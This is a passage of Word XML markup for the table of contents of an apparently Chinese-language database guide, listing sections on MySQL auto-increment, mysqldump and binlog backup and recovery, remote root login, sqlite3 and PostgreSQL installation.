              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779546" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AUTO_INCREMENT</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>详解（含</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NULL</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>值、初始值、指定值等说明）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779546 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="512856A2" w14:textId="7880DA97" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779547" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>初始值</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779547 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13906297" w14:textId="54545283" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779548" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>如何让表的自增</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>从</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>开始</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779548 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2522F740" w14:textId="055549A6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779549" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>记录数据插入或者修改的时间</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779549 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>84</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49741529" w14:textId="32421999" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779550" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>四个设置该字段的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">MySQL </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>脚本应用案例</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779550 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>84</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="055CA79B" w14:textId="0D9CA30E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779551" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>备份：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mysqldump</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>binlog</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779551 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>85</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E969364" w14:textId="2A7652D8" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779552" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mysqldump</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779552 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>85</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01A13202" w14:textId="6452E45E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779553" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>备份</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779553 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>87</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20081F91" w14:textId="40AE08E8" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779554" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>开启</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>log-bin</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>及</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>bin-log</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>配置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779554 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72AFB0ED" w14:textId="61B1601B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779555" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>查看</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>bin</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>文件：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mysqlbinlog</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779555 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="592362BA" w14:textId="6F2F2634" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779556" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>增量恢复</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779556 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>89</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D8F6E16" w14:textId="7CB01F2E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779557" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>其他的备份工具</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779557 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>90</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="427F06C7" w14:textId="06508A1B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779558" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sqlite3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779558 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>90</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E33D065" w14:textId="3A0A9A0F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779559" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>允许外部</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>登录（默认只允许</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>localhost</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779559 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44CE6CD6" w14:textId="750DDC4C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779560" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>postgreSQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779560 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E3225C9" w14:textId="1599376C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779561" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779561 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24E053E8" w14:textId="511B13A1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
